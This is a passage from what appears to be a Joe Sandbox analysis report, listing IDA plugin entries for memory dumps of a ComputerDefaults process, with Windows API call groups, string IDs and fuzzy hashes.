                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHeapLast$FreeObjectProcessSingleWait
                                                                    • String ID:
                                                                    • API String ID: 453756160-0
                                                                    • Opcode ID: be5717ba0dd3ba34e7796c3330fca313803aac6e29d29c76640078b06fb0c00b
                                                                    • Instruction ID: 5e909fb3c6761cb6ed5042e6214b9a94d11bb32edb71880aefe60fe17ae6485f
                                                                    • Opcode Fuzzy Hash: be5717ba0dd3ba34e7796c3330fca313803aac6e29d29c76640078b06fb0c00b
                                                                    • Instruction Fuzzy Hash: 05417222E0C68286EE6AFB65E4443B967A0FF4A7C0F444531DA9EC6696FF3CE445D300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess
                                                                    • String ID:
                                                                    • API String ID: 3859560861-0
                                                                    • Opcode ID: 7839655dfa8658e8f8884e265d62c7628ffbd77a84ac65f0d2bc9ced9e9708a3
                                                                    • Instruction ID: 0f4ec95fe92a0b36ba897e9286209beed597380a7cd37e4f41214dc64a421bc2
                                                                    • Opcode Fuzzy Hash: 7839655dfa8658e8f8884e265d62c7628ffbd77a84ac65f0d2bc9ced9e9708a3
                                                                    • Instruction Fuzzy Hash: 67112A36E08B8183E746EB96A508379BAA5FB8EFD5F089270CE0D57714EF3890418200
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: RtlQueryFeatureConfiguration$ntdll.dll
                                                                    • API String ID: 1646373207-4111156962
                                                                    • Opcode ID: 1992f0fe7917b2e6ebf28e37a0408d614ff665c22b335ac95de5566c6a2f3afc
                                                                    • Instruction ID: f9b04f7a6dfdc980713cdafa8997c89a60aba1707194f423f15fc8a5914bae00
                                                                    • Opcode Fuzzy Hash: 1992f0fe7917b2e6ebf28e37a0408d614ff665c22b335ac95de5566c6a2f3afc
                                                                    • Instruction Fuzzy Hash: 03417E72E19A568AEB66EF15E80066977A4FB9A780F048535DE4E83751FF3CE4009B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: NtUpdateWnfStateData$ntdll.dll
                                                                    • API String ID: 1646373207-3251081820
                                                                    • Opcode ID: c0be043dda879b6ec2ef8cb961e6d751a11d27795041a3e09d5449f13f9a2555
                                                                    • Instruction ID: 418b382df945b4e25cc52fb9601b95293ffc5aac8dfcd9bb3c9b77201978fe13
                                                                    • Opcode Fuzzy Hash: c0be043dda879b6ec2ef8cb961e6d751a11d27795041a3e09d5449f13f9a2555
                                                                    • Instruction Fuzzy Hash: 44112831E0DB5686EB52FB09E44062AA7A4FB5ABD0F448535DA8D87B24FF3CE4049B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: RtlDisownModuleHeapAllocation$ntdll.dll
                                                                    • API String ID: 1646373207-704576883
                                                                    • Opcode ID: 229b584da9a03a6f301c56660977567bcef6891455db3f04b884ccda672eb287
                                                                    • Instruction ID: e9fd3a7c74366b411b952bbf42b292624eb1e86b60c278f0b7ed9a1e165f169b
                                                                    • Opcode Fuzzy Hash: 229b584da9a03a6f301c56660977567bcef6891455db3f04b884ccda672eb287
                                                                    • Instruction Fuzzy Hash: 5201E220E0EB4282EE42FB1AB88403967A4FF6ABC1F449535D94D83724FF2CE4449700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: RtlNtStatusToDosErrorNoTeb$ntdll.dll
                                                                    • API String ID: 1646373207-1321910969
                                                                    • Opcode ID: cbde4633f7ff6e886cc507481b3a430e35aca48a1cbb2704f6b39aa8349852cd
                                                                    • Instruction ID: 3934ea41ea0cd309976bcb4af6ffa71eeaae9acc174bc8706c7577cedc6667b0
                                                                    • Opcode Fuzzy Hash: cbde4633f7ff6e886cc507481b3a430e35aca48a1cbb2704f6b39aa8349852cd
                                                                    • Instruction Fuzzy Hash: 4FF0C421E1EB4686EE46FB59F88417967A4FF5E781F489439C90D82361FF3CE444A300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                                    • API String ID: 1646373207-582119455
                                                                    • Opcode ID: 6400eef266303576cd76d727a18ac7e266c214ed529fd7bc0f16dadba5649e33
                                                                    • Instruction ID: ee62ee38076a3c048206952dfee0815609827e2c96fb7ca2aa01f9ebd04c64d3
                                                                    • Opcode Fuzzy Hash: 6400eef266303576cd76d727a18ac7e266c214ed529fd7bc0f16dadba5649e33
                                                                    • Instruction Fuzzy Hash: C7F0B220E1EB068AEE46FB59A85417427A4FF6BB82F489535C85D86360FF3CA548A710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: RaiseFailFastException$kernelbase.dll
                                                                    • API String ID: 1646373207-919018592
                                                                    • Opcode ID: 09ea6166a3b3b09fec9e0a785e22ff8a50ff87065bfa314376deacdcf03cbf3a
                                                                    • Instruction ID: 1d96e8a184afa9b93e194f141593f9688a8ad1c008ae3355df9e0fde58a0d2df
                                                                    • Opcode Fuzzy Hash: 09ea6166a3b3b09fec9e0a785e22ff8a50ff87065bfa314376deacdcf03cbf3a
                                                                    • Instruction Fuzzy Hash: 2BF0B721E1CA9182EA05AB06F844079AB64FB8ABC1F44D135DA5E87B18EE3CD5459700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: RtlUnregisterFeatureConfigurationChangeNotification$ntdll.dll
                                                                    • API String ID: 1646373207-1836318313
                                                                    • Opcode ID: f8eeca5eaa1c272df2dbc9ddf2fd971c14498ea88b89c166cf0dac5d8c7bd158
                                                                    • Instruction ID: 7d00c7015faf4b0c2cf809453d5e7d622b5017df212be1fe9595b6c2c87b57a1
                                                                    • Opcode Fuzzy Hash: f8eeca5eaa1c272df2dbc9ddf2fd971c14498ea88b89c166cf0dac5d8c7bd158
                                                                    • Instruction Fuzzy Hash: 06F0AF24E0EB0682EA06FB19B85417427A5FF5BBC1F889975C80E86361FF3CA054E300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: RtlUnsubscribeWnfNotificationWaitForCompletion$ntdll.dll
                                                                    • API String ID: 1646373207-368597124
                                                                    • Opcode ID: 570da0de0a43d0f678dacb31ba675c8fb9fec901843e17b8171e6b7d8c1aec7e
                                                                    • Instruction ID: 5886229d45c7f4c3fa7ee55d389ca6dfd51e7440f9cfc7a74c4c949589eb25e1
                                                                    • Opcode Fuzzy Hash: 570da0de0a43d0f678dacb31ba675c8fb9fec901843e17b8171e6b7d8c1aec7e
                                                                    • Instruction Fuzzy Hash: 64F0B230E1EB0682FE56FB19F89417427A4AF6BBD1F489475C81E863A1FF3CA454A700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$ExclusiveLock$AcquireAllocFreeRelease
                                                                    • String ID:
                                                                    • API String ID: 3195745993-0
                                                                    • Opcode ID: 67a44af7acb4a5c66add0f3641ead533efa0ade22f71b1b8bedea6f7d64fb8c8
                                                                    • Instruction ID: 0e292dbf283c61a2f9c5f9ecfaeffd4a4f3a7b2fc42e9975020c8a8ef9f1fbae
                                                                    • Opcode Fuzzy Hash: 67a44af7acb4a5c66add0f3641ead533efa0ade22f71b1b8bedea6f7d64fb8c8
                                                                    • Instruction Fuzzy Hash: DF418F32E1CB8186EA12EF55E4046AAAB65FB8ABC4F445031EE8D57B59EF3CD445C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Alloc
                                                                    • String ID: P
                                                                    • API String ID: 651230671-3110715001
                                                                    • Opcode ID: 2d7a7aeecd4843aaf3791680b7938d9a99b08a20634d501db3ba8bb378b9d937
                                                                    • Instruction ID: bea2c06a31b3f274907616d560f06737ef520c8c3f1e7900cd46ec9f9883bccb
                                                                    • Opcode Fuzzy Hash: 2d7a7aeecd4843aaf3791680b7938d9a99b08a20634d501db3ba8bb378b9d937
                                                                    • Instruction Fuzzy Hash: 1D417B32E0864182EE26EB0AE400179B7A0FB5ABC1F084535CB8E8B754FF7CE881D340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                    • String ID:
                                                                    • API String ID: 17069307-0
                                                                    • Opcode ID: 96c2f000da7bb262ac0344aab7d028acaa1cca36bbd187db30a812ebffabda99
                                                                    • Instruction ID: ce8018b905741f76042b8337e8bc5fc226f7d50d49ab7f72c8f8b3ab8188d9fd
                                                                    • Opcode Fuzzy Hash: 96c2f000da7bb262ac0344aab7d028acaa1cca36bbd187db30a812ebffabda99
                                                                    • Instruction Fuzzy Hash: EA316B25E0C64687FB22FB52A4402786B90EB57BC0F485035CA4E93795EF3DE859A340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                    • String ID:
                                                                    • API String ID: 140117192-0
                                                                    • Opcode ID: 93391bc25e3320106a62cd188c008aa4dbb3a62d6693d546509f5a9be35dd2eb
                                                                    • Instruction ID: a12b2b783d38d660e7c4d4e1f480f80d6ea6f0802022b16b853f4825453be65d
                                                                    • Opcode Fuzzy Hash: 93391bc25e3320106a62cd188c008aa4dbb3a62d6693d546509f5a9be35dd2eb
                                                                    • Instruction Fuzzy Hash: AA41C235E0CB1181EA1AFB18F88036577A8FB8A7C4F904536DA8D82765EF3DE544E700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocCurrentThread
                                                                    • String ID:
                                                                    • API String ID: 108891271-0
                                                                    • Opcode ID: cbacf68ce179a113a030b78f5713f9b24fef76bc465ed5b4f8dd3653670f2632
                                                                    • Instruction ID: b226b9949ae02d4aaaa62f8c1ddcb3ad856a7154b3dba3bb2faff804c0572936
                                                                    • Opcode Fuzzy Hash: cbacf68ce179a113a030b78f5713f9b24fef76bc465ed5b4f8dd3653670f2632
                                                                    • Instruction Fuzzy Hash: AE315032E18B81C6E751FF29E4402697BA4FB5AF84F589135CA4D97364EF38E850E740
                                                                    APIs
                                                                    • CreateThreadpoolTimer.KERNEL32 ref: 00007FF64D6071CF
                                                                    • GetLastError.KERNEL32(?,?,?,00007FF64D606D1A), ref: 00007FF64D6071E7
                                                                      • Part of subcall function 00007FF64D6096C8: SetThreadpoolTimer.KERNEL32(?,?,?,00007FF64D6094F8), ref: 00007FF64D6096D9
                                                                      • Part of subcall function 00007FF64D6096C8: WaitForThreadpoolTimerCallbacks.KERNEL32(?,?,?,00007FF64D6094F8), ref: 00007FF64D6096ED
                                                                    • SetLastError.KERNEL32(?,?,?,00007FF64D606D1A), ref: 00007FF64D6071FF
                                                                    • SetThreadpoolTimer.KERNEL32(?,?,?,00007FF64D606D1A), ref: 00007FF64D607234
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadpoolTimer$ErrorLast$CallbacksCreateWait
                                                                    • String ID:
                                                                    • API String ID: 1675045912-0
                                                                    • Opcode ID: 9e329132ff31cce7907abeb0333a5040db68977acc37851c899197419cd52495
                                                                    • Instruction ID: 30e318f458a3050aeae713e0dcf531ec35476ccca889f8cc9df60f98dc4f96e4
                                                                    • Opcode Fuzzy Hash: 9e329132ff31cce7907abeb0333a5040db68977acc37851c899197419cd52495
                                                                    • Instruction Fuzzy Hash: 04117932E1CB9087EB12FB25A40027DBA60FB4AFC0F489170EE5947B54EF39D4169700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExclusiveLockSection$AcquireEnterLeaveRelease
                                                                    • String ID:
                                                                    • API String ID: 1115728412-0
                                                                    • Opcode ID: 77543353b86641d8a315f284aef6bc3c8107a275f25ea5a691ef58bd82b7196b
                                                                    • Instruction ID: b39fd866eda19911e1848271a995574cbc0915f2fcf747758272676cd8c18776
                                                                    • Opcode Fuzzy Hash: 77543353b86641d8a315f284aef6bc3c8107a275f25ea5a691ef58bd82b7196b
                                                                    • Instruction Fuzzy Hash: A9014C62E18B8283EA15EF66A544079AB60FB8AFC4B18D230DE4E53714EF3CD481C700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess
                                                                    • String ID:
                                                                    • API String ID: 3859560861-0
                                                                    • Opcode ID: 31ac22cd23254083e3b8c7319c70c4149d921fdb885e004be252a837333b0b45
                                                                    • Instruction ID: 59a027651a82022e4bd86812ec1a977505dc41003ae2abe8c6dad8bbbc3add81
                                                                    • Opcode Fuzzy Hash: 31ac22cd23254083e3b8c7319c70c4149d921fdb885e004be252a837333b0b45
                                                                    • Instruction Fuzzy Hash: 60B17D36E08B818AEB11EFA5E4401AE77B4FB4A788F144136EE8D57B19EF78D194D700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess$memmove_s
                                                                    • String ID:
                                                                    • API String ID: 2685253353-0
                                                                    • Opcode ID: 3f7360286ce7024f69b3a96a6d8079e91912d1a5a0922a29236bf2a8a269d891
                                                                    • Instruction ID: d83ed5cce51c8cf3d18f7b52c899990c3614d5837a170d13e516810aba665285
                                                                    • Opcode Fuzzy Hash: 3f7360286ce7024f69b3a96a6d8079e91912d1a5a0922a29236bf2a8a269d891
                                                                    • Instruction Fuzzy Hash: E741AB32E2CB8186DB12EB26A4486A9B766FB8BFC4F548131DE4C57765EF38D4819700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891815568.00007FF64D60F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ff64d600000_ComputerDefaults.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess
                                                                    • String ID:
                                                                    • API String ID: 3859560861-0
                                                                    • Opcode ID: 25d70bf814341b1633c14161b9fa4c48f781113a3cf24a804d35cb2cb9e04ac4
                                                                    • Instruction ID: e7ce52922fdd929495a632403b5c4da5bd9042e71827d22db77c95cbd9b7f023
                                                                    • Opcode Fuzzy Hash: 25d70bf814341b1633c14161b9fa4c48f781113a3cf24a804d35cb2cb9e04ac4
                                                                    • Instruction Fuzzy Hash: A5311626E19F9486D342DF29A440269BB74FB9AF94F18A264CF8827716DF34D4E2C740
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.1891708317.00007FF64D601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64D600000, based on PE: true
                                                                    • Associated: 0000000A.00000002.1891636005.00007FF64D600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891769613.00007FF64D60B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000A.00000002.1891793402.00007FF64D60E000.00000004.00000001.01000000.00000007.sdmpDownload File
